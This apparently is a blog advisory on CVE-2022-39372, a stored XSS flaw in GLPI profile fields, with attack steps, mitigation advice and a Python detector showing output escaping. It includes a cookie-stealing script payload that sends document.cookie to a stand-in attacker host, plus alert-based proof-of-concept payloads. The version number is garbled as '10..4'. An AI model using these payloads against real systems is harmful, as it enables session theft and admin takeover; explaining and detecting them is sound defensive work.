GLPI (Gestionnaire Libre de Parc Informatique) is popular open-source software for managing IT assets, tracking software licenses, and handling IT support tickets. If you manage IT assets in your company, there’s a good chance you use or know about GLPI. But in 2022, a serious vulnerability was discovered that impacts users and organizations relying on this platform: CVE-2022-39372.
In this exclusive post, we’ll break down what this bug is, how it can be exploited, demonstrate it with simple code, and explain what you should do right now to protect yourself.
What is CVE-2022-39372?
CVE-2022-39372 is a stored cross-site scripting (XSS) vulnerability found in GLPI before version 10..4. The flaw allows an authenticated user to inject malicious scripts directly into their account information. Whenever an admin or another user views that user’s profile or its information, the embedded script runs in their browser, leading to all sorts of attacks such as session hijacking, credential theft, or even carrying out unwanted actions on the victim’s behalf.
Official References
- CVE Details Entry
- GLPI Security Advisory
1. The attacker logs in to GLPI (they only need basic user access, not admin).
2. They update their own profile details – such as their name or address – but instead of normal text, they add a malicious script. For example:

```html
<script>alert('XSS by John Doe')</script>
```

3. At some point, an admin or another privileged user reviews or edits the attacker's profile.
4. As soon as the malicious field is loaded in their browser, the script executes, giving the attacker access to the victim’s session, cookies, or data.
Example Exploit
Let’s look at what an attacker would actually do.
Suppose the attacker navigates to their profile update page and enters this into the Name field:

```html
<script>fetch('https://evil.example.com/steal?cookie=' + document.cookie)</script>
```
Step 2: Malicious Code is Stored
GLPI, in versions before 10..4, did not properly sanitize or encode this input. So the malicious code is saved, just like a regular name.
Step 3: Admin Visits Attacker’s Profile
When an admin later views this account – perhaps to reset a password or check a support ticket – the browser loads the profile page, runs the malicious code immediately, and leaks sensitive session data.
Here’s a quick proof-of-concept (PoC) you can test (ONLY on a safe testing server!):

```html
<!-- Enter this into any text field in your user profile -->
<script>alert(document.domain);</script>
```
After you save the profile and an admin clicks to view your account, they’ll see a popup revealing the domain. In targeted attacks, this could easily be something more dangerous, like session stealing or redirecting the admin.
Why is This a Big Deal?
- Admin Takeover: If an attacker can grab an admin’s session, they could gain unrestricted access to all IT assets and user data.
- IT Disruption: XSS can be used for ransomware deployments or to spread malware to other users.
- Compliance Violations: For companies under regulations like HIPAA, GDPR, or PCI-DSS, breaches like this can result in severe penalties.
Mitigation: How Do I Fix This?
The only way to stay protected is to upgrade to GLPI version 10..4 or above. GLPI patched the bug by properly sanitizing user inputs on all profile fields.
> There are no known workarounds – the vulnerability is embedded at the application layer, so web server or browser settings won’t provide sufficient protection.
- GLPI Download Page
- Check the release notes for 10..4
- [ ] Consider reviewing your user profiles for any suspicious scripts or strange input.
- [ ] Instruct your admins and users to avoid clicking on suspicious links or profiles until upgrade is complete.
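To make the fix and the profile-review step concrete, here is an added Python example; it is not GLPI code (GLPI is written in PHP, and its real rendering code is not reproduced here). It runs a markup heuristic over a constructed set of profile rows and contrasts verbatim rendering of a stored value with HTML-encoding on output, which is the class of fix described above. The row layout, field names and sample values are assumptions made for illustration.

```python
import html
import re
from typing import Dict, List

# Constructed sample of user rows (not real GLPI data): the free-text fields a
# user can edit on their own profile, one carrying a stored-XSS payload of the
# kind the advisory describes, one a legitimate value that also uses brackets.
SAMPLE_USERS = [
    {"id": 1, "name": "alice", "realname": "Alice Example", "city": "Berlin"},
    {"id": 2, "name": "mallory", "realname": "<script>alert(document.domain);</script>", "city": "Paris"},
    {"id": 3, "name": "bob", "realname": "Bob O'Neil <bob@example.com>", "city": "Oslo"},
]

# Markup that has no business in a plain-text profile field: tags, inline event
# handler attributes and javascript: URLs. This is a triage heuristic, not a parser,
# so every hit (including false positives such as bob's e-mail) needs a human look.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)

def find_suspicious_profiles(users: List[Dict]) -> List[Dict]:
    """Return one record (user id, field, value) per profile field that contains markup."""
    hits = []
    for user in users:
        for field in ("name", "realname", "city"):
            if SUSPICIOUS.search(str(user.get(field, ""))):
                hits.append({"id": user["id"], "field": field, "value": user[field]})
    return hits

def render_profile_unsafe(user: Dict) -> str:
    """Pre-fix behaviour: the stored value is interpolated verbatim, so markup becomes live HTML."""
    return f"<td>{user['realname']}</td>"

def render_profile_safe(user: Dict) -> str:
    """Fixed behaviour: HTML-encode on output, so the browser shows the payload as inert text."""
    return f"<td>{html.escape(user['realname'], quote=True)}</td>"

if __name__ == "__main__":
    for hit in find_suspicious_profiles(SAMPLE_USERS):
        print(f"user {hit['id']}: field {hit['field']!r} contains markup: {hit['value']!r}")
    mallory = SAMPLE_USERS[1]
    print("unsafe:", render_profile_unsafe(mallory))
    print("safe:  ", render_profile_safe(mallory))
```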
Final Thoughts
GLPI is a powerful tool for IT management, but like any software, it can have vulnerabilities. CVE-2022-39372 serves as a strong reminder to keep your critical systems up-to-date and to educate users about security best practices.
Upgrade now, and stay secure!
*If you found this useful or want to share your experience, leave a comment below or follow for more updates on open-source security.*
Timeline
Published on: 11/03/2022 16:15:00 UTC
Last modified on: 11/03/2022 18:56:00 UTC